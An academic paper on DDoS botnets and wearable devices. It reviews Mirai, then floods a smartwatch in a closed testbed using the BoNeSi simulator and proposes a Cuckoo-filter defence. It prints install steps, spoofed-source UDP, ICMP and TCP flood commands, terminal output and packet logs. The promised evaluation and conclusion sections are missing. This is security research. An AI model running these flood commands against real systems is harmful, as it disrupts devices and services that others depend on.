

PERFORMANCE ANALYSIS OF IoT-ENABLED DDoS BOTNETS IN WEARABLE DEVICES

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ABSTRACT

Wearable devices (WD) such as smartwatches, fitness trackers, Medical wearables, smart headphones, smart glasses, and smart clothing, etc. are gaining popularity in recent years as the number of users is increasing. With sensing, computing, and communication capability wearable devices are forming a new segment called Wearable Internet-of-Things (WIoT). There is a high chance for these WIoT devices to be new sources of attack for malicious activities such as botnet attacks. The goal of our research is to present a performance analysis of DDoS capable IoT botnets in wearable devices. In the first part, we will show the possibilities of deploying these WIoT devices in DDoS attacks. To demonstrate this, we conducted repeated UDP, TCP, HTTP, and ICMP flooding attacks using BoNeSi DDoS botnet simulator, targeting a wearable device. We also proposed a mitigation technique using Cuckoo Filter (CF) which is designed based on benign source information.

Keywords: *Wearable Device, Botnets, IoT Botnets, DDoS Attacks, BoNeSi DDoS Botnet Simulator, Cuckoo Filter.*

1. INTRODUCTION

A botnet has become one of the most serious security issues for many internet-related security issues. For understanding Botnets, it is important to understand what a bot is, botmaster, and command and control system (c & c) [1]. A bot is a type of malware also known as Zombie, is a short form of Robot. Botmaster installs this malware into compromised devices and controls using a command and control system. So, we can say botnet is an intelligent network formed using bots, these bots are remotely handled by the botmaster. Botmaster controls botnet using the c & c system. Based on the communication methods used by botmaster botnets are classified as Direct, Centralized, Decentralized, or Peer-to-Peer, and Hybrid [2]. Botnets are being used for data stealing, spam sending, DDoS attacks, which also makes easy to collect personal information of users by accessing the device. The growing advances in IoT and IoT's increasing popularity have made IoT devices an easy and alluring target

for botmasters. As we know IoT is interconnected computing, digital and mechanical-devices group that communicates via the internet also sends and receives data via the internet. Sensors used in these and their processing power made these adaptable in many environments [3]. IoT is used for many applications like home automation, health care appliances, smart city, smart grids, smart retails, autonomous cars, industrial automation, and many other fields. IoT devices are capable of creating and analyzing an individual's information and can take actions according to those analyzed information [4]. But most of the IoT devices use default passwords which makes bots get access easily. As IoT devices constantly connect to the internet, use an ever-growing array of networked systems, and as many use default passwords allows for easy access. Botmaster can build and use spam mailing, bitcoins and DDoS attacks, etc. within minutes using IoT botnets. Physical attack,

network attack, software attack, and encryption attack are the classes of IoT botnet attacks [5]. DDoS attacks using IoT devices are the biggest threat to network security issues. DDoS attacks are the extended versions of denial-of-service (DoS) attacks. Usually, in DDoS attacks, the botmaster intends to increase their botnet size as much as possible by adding more and more bots. When we see DDoS attacks history Mirai botnet has become the biggest IoT based DDoS attack in recent years. Advances in technology, components miniaturization, power sources efficiency, and alternatives for network solution, newly introduced sensors contributed to the wearable devices development. Wearable devices are made to be used for several kinds of purposes. Wearable devices have high potential and many known benefits, but their growing usage gives rise to many privacy suggestions. Wearable devices handle personal information of users by collecting, transmitting, and storing the data continuously. This information can be publicly available, where it can be shared with a network of known or unknown or untrusted parties. WDs collect data about the users along with their surrounding may lead to serious privacy issues, risks, and threats. When this data is misused it affects not only the individual users but also the involved surroundings such as society and the enterprises. Wearable devices are being applied in several application fields such as fitness tracking, health-care appliances, Security, home automation, entertainment. Their growing popularity, autonomy, and small size increase the potential to be used in different activities and scenarios. So, it is important to understand the possibilities of malicious activities to be performed using these wearable devices. For fulfilling this purpose here in our work, we will present performance analysis of DDoS capable IoT botnets in wearable devices. Firstly, we will show the possibilities of deploying these WIoT devices in DDoS attacks by conducting repeated DDoS attacks using the DDoS botnet simulator BoNeSi, targeting a wearable device. The outcomes include wearable device sending RST (reset) packet response for confirming the denial of service, resetting the device IP address, and losing the connection with the tracking system. We also proposed a mitigation technique using Cuckoo Filter (CF) designed based on benign source information and tested using some benign and malicious data sets. Further, our paper will be arranged as in section 2 we present the related work of this research work which includes Mirai

IoT botnet analysis and wearable device working. Section 3 presents the proposed attack methodology followed by the proposed attack method's evaluation and results in section 4. Section 5 presents the proposed mitigation technique followed by the mitigation technique's evaluation and results in section 6. At last, section 7 concludes our paper.

2. RELATED WORK

Internet-of-Things (IoT) devices have become a target for various malicious activities, one of such serious malicious activities is DDoS attacks. DDoS attack history shows Mirai botnet has become the biggest and predominant IoT based DDoS attack in recent years.

2.1 Mirai Botnet

Malware Must Die research group detected Mirai malware in 2016, August. Mirai is a Japanese word meaning "the future" [6]. Mirai malware has the ability to control and infect DVRs, home routers and CCTV camera etc. In [6], the authors explained the main components of the Mirai botnet, step by step operation and communication methods, Mirai variants along with the impact of Mirai botnet. In [7], the authors explained the botnets and DDoS attacks along with the Mirai DDoS working and family of Mirai malware. A detailed classification of DDoS attacks along with real-world attack examples are given in [8], authors have also given the analysis of Mirai's framework and operating principles. In [9] authors showed details about IoT botnets and how these botnets are becoming successful with the example of Mirai and a few other such malware along with the strategies for protecting from IoT malware. In [10], authors have presented the growth of Mirai malware upto 600k infections over a seven months period. The authors also showed which types of devices got affected and how the various forms of Mirai malware being developed. In [11], authors presented an analysis of issues of mirai malware and methods for predicting it in IoT. In [12], the authors showed how to use an online available Free and Open-Source Software (FOSS) for detecting, classifying, and removing malware from infected systems along with Mirai's in-depth security analysis. In [13], the authors presented a strategy to show the security issues in IoT devices by deploying the same compromise vector as Mirai malware. Mirai's attack is based on a 62

entry dictionary. Once compromised devices are reported to a control server to use as a part of a large botnet[14]. After being added into a large-scale-botnet it can be exploited in various DDoS attacks. Mirai Malware's main components and its method of operation and communication are explained in detail in [6]. Bot, c & c server, loader, and report-server are the major parts of the Mirai Botnet. The malware which compromises the devices and tries to extend its botnet by targeting other vulnerable devices is known as Bot. The bot can attack the target server immediately after getting the attack- command from its botmaster. The c & c server center of the management of the botnet. It checks the condition of the botnet and plans the new DDoS attacks accordingly. Communication in a botnet is usually conducted by the Tor network. The loader targets different platforms such as ARM, MIPS, and x86, etc. in total 18, by spreading of executables. The database of all the devices in the botnet is maintained by the report server. Newly compromised devices directly communicate with the report server. The c & c can work as a database server of MYSQL. User accounts are created in such database for those wish to hire DDoS service. Mirai has SYN flood, UDP flood, ACK flood, UDP plain flood, TCP stomp flood, DNS server flood, GRE Ethernet flood, valve source engine specification flood, and HTTP flooding attack options. Mirai's basic structure and its source code analysis are explained in detail in [8] for a better understating of its working. The authors have given a detailed explanation of how the Mirai malware attack history, its overview, how it operates along with each folder of its source code available on GitHub. In [15] the authors presented an analysis of Mirai malware with the help of a virtual environment. They have also explained the settings needed to install on run Mirai on the proposed virtual environment for the easy understanding of Mirai malicious software. They have provided both the static analysis and dynamic analysis of Mirai. In [9] the authors presented the high-level details of Mirai malware and its variant malware. The bot code of Mirai is in C programming language which searches for IP

addresses of new vulnerable devices and reasons for causing DDoS attacks. Most of Linux based IoT devices have been a target for Mirai malware. c & c server of Mirai is in GO programming language which is the main part of the Mirai botnet for communication. Till now Mirai malware has targeted 18 different platforms few are Intel x86, ARM, MIPS, and SPARC. Mirai malware targeted Telnet 23 port and TCP port 2323. For finding login credentials attacker used brute force dictionary-based techniques, which contains 62 pairs of username and passwords. The authors also presented the Mirai botnet's variant Hajime botnet overview along with the comparison of both botnet's basic functions.

2.2 Wearable Technology

For wearable devices, it is important to maintain privacy and transmit data securely over the network as these devices transmit vital personal information. Wearable device's system with wireless communication is a new frontier technique which adds another layer to human and machine interaction [16] [17]. An example framework of a wearable technology is shown in figure 1 [18]. Many previous works have shown how wearable devices can be involved in malicious activities. In [19] authors showed how wrist wearables are used by the attacker to know the mechanical lock's unlock combination by presenting deterministic and probabilistic attack frameworks. In [20] authors showed a security issue exploiting a pebble-smartwatch. They developed a appalication as a malware which helped students to cheat in multiple choice exam. In [21] authors presented a work to collect PINs entered on smartphones when smartphone users are wearing a smartwatch being compromised by the botmaster. The authors used a random forest classifier for collecting the PINs entered by users. In [22], presents a attack on numeric touch screen of smartphones based on keystroke inference when the user is wearing smartwatch. In [23] the authors developed a method called MoLe to reveal what a user typing on their keyboard

Figure 1. Wearable technology framework

when wearing smartwatch. Specially designed for samasung gear live smartwatch. In [24] the authors proposed a method to get the inputs on keyboard using smartwatch sensors developed through a side-channel attack. Many research work has been done to present the privacy-related issues in collecting the personal data of individual users of wearable devices along with some other security issues but as of our best knowledge, our work is the first to present the threats related to DDoS attacks on wearable devices. The wearable device used in this research work is Tizen based Samsung Galaxy Watch, as a target device.

3. PROPOSED ATTACK METHOD

In our proposed attack methodology we are using Tizen based Samsung Galaxy Watch (SGW) [25] as a victim or target wearable device (VWD). Exploiting BoNeSi DDoS botnet simulator for performing DDoS attack experiments on SGW.

3.1 Closed Testbed Environment

The closed testbed environment for the proposed attack method is illustrated in figure 2, which includes a laptop with Ubuntu OS as an attacker device. Tizen based SGW as a VWD. The attacker device and the VWD are connected to the same WiFi.

3.2 Technical Flowcharts

The technical flowchart is shown in figure 3 explains the details of the DDoS attack,

Figure 2. Closed Testbed Environment

a process performed using the BoNeSi simulator. BoNeSi usage options are given in figure 5. After the installation of the DDoS simulator tool on the attacker device, start the Wireshark and then start attacking the VWD with the available UDP, TCP, and ICMP flooding packets. Once the attack begins, we can analyze the network packets using Wireshark and record the details of attack packets.

Figure 3. Flowchart explaining the attack process performed on victim wearable device using BoNeSi DDoS botnet simulator

4. EVALUATION AND RESULTS OF ATTACK METHOD

4.1 Tools Used in Attack Method

4.1.1 Bonesi DDoS botnet simulator [26], used to generate network-traffic for several types of protocols. Using this simulator one can produce flooding attacks such as ICMP, UDP, and TCP/HTTP attacks of specified size of botnet

having various IP addresses. This simulator can simulate traffics generated by botnet on wire based testbed environment. BoNeSi can spoof IP addresses of sources even while TCP traffic is being generated which made BoNeSi simulator to have simple stack of TCP to handle TCP connections. It is important to send response-packets to host where BoNeSi is running to get best results. Many tools are available for spoofing IP addresses using UDP and ICMP. But not many

tools are available for TCP. For HTTP-GET flood simulation BoNeSi is first used tool.

4.1.2 Wireshark [27], is a network packet analyzer that analyzes every packet getting

through a network interface. Wireshark has a graphical front-end along with integrated sorting and filtering options. Here we used Wireshark to record and analyze the malformed packet sent to the victim’s machine.

4.1.3 Samsung galaxy watch [25], in this study we used the Tizen-based Samsung Galaxy Watch as a target or victim wearable device. For getting the IP address of the Samsung Galaxy Watch followed the steps explained in [28]. Hacking wearable device is not a part of our work, we have assumed the wearable device is already hacked or compromised.

4.2 System Configurations, System configurations of these attacker and victim devices are provided in Table 1 for attack experiments performed using the BoNeSi simulator.

Table 1. System Configurations used for performing DDoS attacks on VWD using BoNeSi DDoS botnet Simulator.

Systems used	OS	RAM
Laptop (attacker)	Ubuntu 20.04.1 LTS	8 GB
Samsung Galaxy Watch(victim)	Tizen 4	1.5 GB

4.3 Attack Using BoNeSi

Ubuntu Laptop is used with below network information, as shown in below figure 4

```
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 172.30.1.3 netmask 255.255.255.0 broadcast 172.30.1.255
    inet6 fe80::: d57 prefixlen 64 scopeid 0x20<link>
```

Figure 4. Used Network Details

4.3.1 Installing BoNeSi on attacker device

Step 1: Login into the attacker device that is a laptop with Ubuntu OS.

Step 2: Open the “Terminal” to install BoNeSi by using “shell” commands.

Step 3: Firstly, Install BoNeSi dependency libraries by running the below commands, to compile the BoNeSi tool successfully.

```
sudo apt get update
sudo apt install build-essential
sudo apt install make
sudo apt install autoconf
sudo apt install libpcap-dev
sudo apt install automake
sudo apt install gcc
sudo apt install git
sudo apt install libnet1-dev
```

Step 4: Install BoNeSi by running the below commands

```
git clone https://github.com/MarkusGo/bonesi.git
autoreconf -f -i./configure
make
make install
```

Now BoNeSi is ready to be run.

Step 5: The installation of Wireshark on Ubuntu is done by following steps in [29].

Step 6: Run Wireshark in the terminal.

```
$wireshark
```

Step 7: Run the BoNeSi in the terminal.

```
$bonesi
```

We get the output as shown in figure 5 with BoNeSi usage options.

BoNeSi needs a wearable device’s IP address

```

Activities  Terminal
File Edit View Search Terminal Help
hunalll@UBUNTU-HUNALLI:~$ bonesi
Usage: bonesi [OPTION...] <dst_ip:port>

Options:
  -i, --ips=FILENAME           filename with ip list
  -p, --protocol=PROTO         udp (default), icmp or
  -r, --send_rate=NUM          packets per second, 0
  -s, --payload_size=SIZE      size of the payload, (d
  -o, --stats_file=FILENAME    filename for the stati
  -c, --max_packets=NUM        maximum number of pack
  -t, --integer                IPs are integers in ho
  -t, --max_bots=NUM           determine max_bots in
  -u, --url=URL                the url (default: '/')
  -l, --url_list=FILENAME      filename with url list
  -b, --useragent_list=FILENAME filename with useragen
  -d, --device=DEVICE          network listening devi
  -m, --mtu=NUM                set MTU, (default 1500
  -f, --frag=NUM               set fragmentation mode
  -v, --verbose                print additional debug
  -h, --help                   print this message and
Bad destination port: bonesi
hunalll@UBUNTU-HUNALLI:~$
    
```

Figure 5.BoNeSi usage options

[28] to start the flooding attack by using the different methods shown in Figure 6(a),(b)and (c),7(a),(b) and (c) and 8(a),(b) and (c). 50k-bot is an additional option given by the BoNeSi tool which is generated randomly by exploiting 50,000 IP addresses, This file is part of the BoNeSi package. We used the 50k-bot

file as a parameter to attack the wearable devices with the “TCP” protocol. Figure 6,7 and 8 gives the BoNeSi attack methods,Wireshark logs and related graphs for UDP,ICMP and TCP respectively on Ubuntu.

Figure 9. Flow chart for proposed Cuckoo filter-based mitigation technique

5. METHODOLOGY OF PROPOSED DDoS ATTACK MITIGATION TECHNIQUE

Cuckoo Filter (CF), is used for

checking the presence of an element in a set which is probabilistic data structure and space

efficient[30]. Cuckoo Filter gives results “possibly a member of the set” or “definitely not a member of the set”. In other words CF can give false positive results but not false negative results. CF has the advantages of less space, deleting existing items in the filter, and low false-positive rates. The disadvantage of the Cuckoo Filter is the complexity in adding the items to the filter. CF has a hash-table called cuckoo which stores the item’s fingerprints needs to store in CF using cuckoo hash function [31]. Cuckoo Filter uses a cuckoo hashing [32] based n-way set associative hash-table to store the fingerprints of all items. Fingerprints uniquely identify each item by a bit string. A cuckoo hashtable maps an item of the set into two possible buckets of an array of buckets using two hash-functions as shown below equations,

$$i = h_1(x) = \text{hash}(x)$$

$$j = h_2(x) = h_1(x) \oplus \text{hash}(\text{fingerprint}(x))$$

As it stores only the fingerprints of items and uses partial key cuckoo hashing, the cuckoo filter can achieve both high utilization and compactness. The cuckoo filter requires bits of space per inserted key is,

$$(\log_2(1 / \epsilon) + 2) / \alpha$$

where α is the hash table load factor. Delete and lookup operations are easy, as there are a maximum of two locations to check by $h_1(x)$ and $h_2(x)$. Figure 9 illustrates the working flow of the proposed cuckoo filter-based mitigation technique. Constructed the Cuckoo filter using the cuckoo hash function by adding the collected benign source IP address data. And then for test purposes, we used Mirai UDP and Mirai HTTP flooding data. If the test IP address is already present in the cuckoo filter no need to add it to the cuckoo filter and we can just block from further communication. If the IP address is not present then add it to the cuckoo filter in its first access request, and block if the repeated access requests are received.


```

Activities Terminal
Terminal
File Edit View Search Terminal Tabs Help
Terminal
hunalit@UBUNTU-HUNALLI:~$ sudo bonest -p udp -d enp0s10 172.30.1.5:80
Warning: There is noch File with useragent names! The user-agent:
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Icedeasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-0etch1)
will be used.
dstIp:      172.30.1.5
dstPort:    80
protocol:   17
payloadSize: 32
rate:       infinite
tps:        (null)
urls:       (null)
useragents: (null)
stats file: stats
device:     enp0s10
maxPackets: infinite
format:     dotted
toggle:     no
3436 packets in 1.472239 seconds
226064 packets in 1.000001 seconds
232763 packets in 1.000002 seconds
234119 packets in 1.000000 seconds
37947 packets in 1.943240 seconds
227716 packets in 1.000000 seconds
219339 packets in 1.000015 seconds
229797 packets in 1.000003 seconds
68125 packets in 1.991844 seconds
236007 packets in 1.000004 seconds
243359 packets in 1.000000 seconds
236776 packets in 1.000000 seconds
231203 packets in 1.000003 seconds
234287 packets in 1.000433 seconds
76346 packets in 1.106717 seconds
1737 packets in 1.288811 seconds
1773 packets in 1.027019 seconds
2383 packets in 1.263927 seconds
3099 packets in 1.065302 seconds
5165 packets in 1.111173 seconds
3657 packets in 1.298884 seconds
1433 packets in 1.052212 seconds
2906 packets in 1.030679 seconds
3056 packets in 1.015369 seconds

```

6(a)

6(b)

6(c)

Figure 6. BoNeSi attack method, Wireshark logs, and Related Graph using UDP Packets

```

Activities Terminal
Terminal
File Edit View Search Terminal Tabs Help
Terminal
hunal1@UBUNTU-HUNALLI:~$ sudo bonest -p icmp -d enp0s10 172.30.1.5:80
Warning: There is no ch file with useragent names! The user-agent:
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Icwesael/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-0etch1)
will be used.
dstIp: 172.30.1.5
dstPort: 80
protocol: 1
payloadSize: 32
rate: infinite
ips: (null)
urls: (null)
useragents: (null)
stats file: stats
device: enp0s10
maxPackets: infinite
format: dotted
toggle: no
60815 packets in 1.935281 seconds
838 packets in 1.100527 seconds
1685 packets in 1.208822 seconds
349 packets in 1.171862 seconds
1143 packets in 1.330400 seconds
583 packets in 1.104753 seconds
257479 packets in 1.000002 seconds
253082 packets in 1.000002 seconds
259489 packets in 1.000002 seconds
255421 packets in 1.000000 seconds
257708 packets in 1.000000 seconds
254771 packets in 1.000001 seconds
257169 packets in 1.000002 seconds
259534 packets in 1.000000 seconds
254852 packets in 1.000003 seconds
261344 packets in 1.000000 seconds
257116 packets in 1.000000 seconds
87649 packets in 2.867474 seconds
238038 packets in 1.000001 seconds
250712 packets in 1.000000 seconds
244391 packets in 1.000001 seconds
62576 packets in 1.039821 seconds
    
```

7(a)

No.	Time	Source	Destination	Protocol	Length	Info
60654	45.219047419	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=70 (no response found!)
60655	45.219051125	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=140 (no response found!)
60656	45.219054776	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=169 (no response found!)
60657	45.219058484	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=227 (no response found!)
60658	45.219062248	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=186 (no response found!)
60659	45.219066025	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=181 (no response found!)
60660	45.219070423	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=82 (no response found!)
60661	45.219074883	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=81 (no response found!)
60662	45.219079225	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=72 (no response found!)
60663	45.219083660	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=33 (no response found!)
60664	45.219088066	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=228 (no response found!)
60665	45.219092585	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=129 (no response found!)
60666	45.219097249	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=255 (no response found!)
60667	45.219101818	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=9 (no response found!)
60668	45.219106118	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=181 (no response found!)
60669	45.219110513	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=39 (no response found!)
60670	45.219114988	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=75 (no response found!)
60671	45.219119423	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=9 (no response found!)
60672	45.219123812	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=49 (no response found!)
60673	45.219128289	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=48 (no response found!)
60674	45.219132792	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=160 (no response found!)
60675	45.219137311	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=146 (no response found!)
60676	45.219141842	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=112 (no response found!)
60677	45.219146367	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=181 (no response found!)
60678	45.219150923	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=92 (no response found!)
60679	45.219155488	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=29 (no response found!)
60680	45.219160066	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=179 (no response found!)
60681	45.219164656	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=6 (no response found!)
60682	45.219169254	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=37 (no response found!)
60683	45.219173863	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=176 (no response found!)
60684	45.219178482	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=121 (no response found!)
60685	45.219183111	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=168 (no response found!)
60686	45.219187749	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=52 (no response found!)
60687	45.219192397	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=99 (no response found!)
60688	45.219197046	255.255.255.255	172.30.1.5	ICMP	74	Echo (ping) request id=0x0042, seq=66/16896, ttl=70 (no response found!)

Frame 1: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface wlan0, id 0

```

0000 ff ff ff ff ff ff 00 24 d7 98 82 2c 08 06 00 01 .....$.....
0010 08 00 06 04 00 01 00 24 d7 98 82 2c ac 1e 01 02 .....$.....
0020 00 00 00 00 00 00 ac 1e 01 05 .....$.....
    
```

7(b)

7(c)

Figure 7. BoNeSi attack method, Wireshark logs, and Related Graph using ICMP Packets

```
Activities Terminal
Terminal
File Edit View Search Terminal Tabs Help
Terminal
hunalli@UBUNTU-HUNALLI:~/bonest_lib/bonest-masters$ sudo bonest -p tcp -u / -d enp0s10 -t 50k-bots 172.30.1.1:80
Warning: There is noch File with useragent names! The user-agent:
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-0etch1)
will be used.
dstIp: 172.30.1.1
dstPort: 80
protocol: 6
payloadSize: 32
MTU: 1500
fragment mode: IP
rate: infinite
ips: 50k-bots
urls: (null)
useragents:: (null)
stats file: stats
device: enp0s10
maxPackets: infinite
format: dotted
toggle: no
reading file...done
Couldn't get netmask for device enp0s10: SIOCGIFADDR: enp0s10: No such device
19437 requests in 1.143679 seconds
0 finished correctly
0 resets received
2154 requests in 1.316201 seconds
0 finished correctly
0 resets received
1499 requests in 1.243752 seconds
0 finished correctly
0 resets received
2108 requests in 1.568678 seconds
0 finished correctly
0 resets received
3477 requests in 1.064431 seconds
0 finished correctly
0 resets received
280 requests in 1.170229 seconds
0 finished correctly
0 resets received
97142 requests in 1.000001 seconds
0 finished correctly
0 resets received
91220 requests in 1.000002 seconds
0 finished correctly
```

8(a)

No.	Time	Source	Destination	Protocol	Length	Info
8875	11.364490837	43.146.44.119	172.30.1.1	TCP	62	13465 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8874	11.364480606	121.19.208.149	172.30.1.1	TCP	78	23815 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1402 WS=1 TSval=1365282408 TSecr=0 SACK_PERM=1
8873	11.364470662	98.236.212.236	172.30.1.1	TCP	62	33930 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1516 SACK_PERM=1
8872	11.364459952	133.163.29.148	172.30.1.1	TCP	62	13283 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1516 SACK_PERM=1
8871	11.364449375	94.40.244.27	172.30.1.1	TCP	62	25988 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1516 SACK_PERM=1
8870	11.364440040	77.221.134.191	172.30.1.1	TCP	78	12462 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1402 WS=1 TSval=1365282408 TSecr=0 SACK_PERM=1
8869	11.364431088	10.117.213.1	172.30.1.1	TCP	62	11478 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8868	11.364421829	39.241.149.170	172.30.1.1	TCP	74	12188 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1430 SACK_PERM=1 TSval=1840537518 TSecr=0 WS=1
8867	11.364413158	201.111.253.210	172.30.1.1	TCP	62	29310 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8866	11.364404880	132.226.161.106	172.30.1.1	TCP	74	13237 → 80 [SYN] Seq=0 Win=4096 Len=0 WS=1024 MSS=265 TSval=1061109567 TSecr=0
8865	11.364395085	30.78.182.57	172.30.1.1	TCP	74	33215 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 WS=1 TSval=7670396 TSecr=0
8864	11.364386363	55.116.53.25	172.30.1.1	TCP	62	27030 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8863	11.364377037	83.149.35.78	172.30.1.1	TCP	78	12543 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1402 WS=1 TSval=1365282408 TSecr=0 SACK_PERM=1
8862	11.364368248	130.127.157.198	172.30.1.1	TCP	62	32571 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8861	11.364359578	148.195.144.59	172.30.1.1	TCP	62	31247 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1516 SACK_PERM=1
8860	11.364350219	92.72.139.191	172.30.1.1	TCP	74	17865 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1430 SACK_PERM=1 TSval=1840537518 TSecr=0 WS=1
8859	11.364340853	181.23.187.108	172.30.1.1	TCP	62	26743 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8858	11.364330777	255.47.148.203	172.30.1.1	TCP	62	34795 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8857	11.364321941	241.0.45.117	172.30.1.1	TCP	62	28445 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1516 SACK_PERM=1
8856	11.364311917	94.130.238.122	172.30.1.1	TCP	66	17761 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 WS=4 SACK_PERM=1
8855	11.364301775	10.180.208.175	172.30.1.1	TCP	74	24636 → 80 [SYN] Seq=0 Win=4096 Len=0 WS=1024 MSS=265 TSval=1061109567 TSecr=0
8854	11.364292577	19.97.90.204	172.30.1.1	TCP	62	22735 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1516 SACK_PERM=1
8853	11.364283086	205.65.211.226	172.30.1.1	TCP	78	32261 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1402 WS=1 TSval=1365282408 TSecr=0 SACK_PERM=1
8852	11.364274135	123.227.64.162	172.30.1.1	TCP	74	26237 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1024 MSS=265 TSval=1061109567 TSecr=0
8851	11.364265816	168.45.78.250	172.30.1.1	TCP	62	35208 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 SACK_PERM=1
8850	11.364257434	167.214.219.123	172.30.1.1	TCP	78	12120 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1402 WS=1 TSval=1365282408 TSecr=0 SACK_PERM=1
8849	11.364248632	175.117.144.94	172.30.1.1	TCP	78	33948 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1402 WS=1 TSval=1365282408 TSecr=0 SACK_PERM=1
8848	11.364239558	186.39.73.145	172.30.1.1	TCP	74	28939 → 80 [SYN] Seq=0 Win=4096 Len=0 WS=1024 MSS=265 TSval=1061109567 TSecr=0
8847	11.364229522	251.0.216.101	172.30.1.1	TCP	74	32462 → 80 [SYN] Seq=0 Win=4096 Len=0 WS=1024 MSS=265 TSval=1061109567 TSecr=0
8846	11.364220523	207.118.144.76	172.30.1.1	TCP	74	31465 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 WS=1 TSval=7670396 TSecr=0
8845	11.364211334	24.168.188.93.rev.v.	172.30.1.1	TCP	74	18480 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 WS=1 TSval=7670396 TSecr=0
8844	11.364202121	55.11.190.97	172.30.1.1	TCP	74	13424 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 WS=1 TSval=7670396 TSecr=0
8843	11.364193339	ds1b-002-204-153-20.	172.30.1.1	TCP	74	26568 → 80 [SYN] Seq=0 Win=4096 Len=0 MSS=1460 WS=1 TSval=7670396 TSecr=0
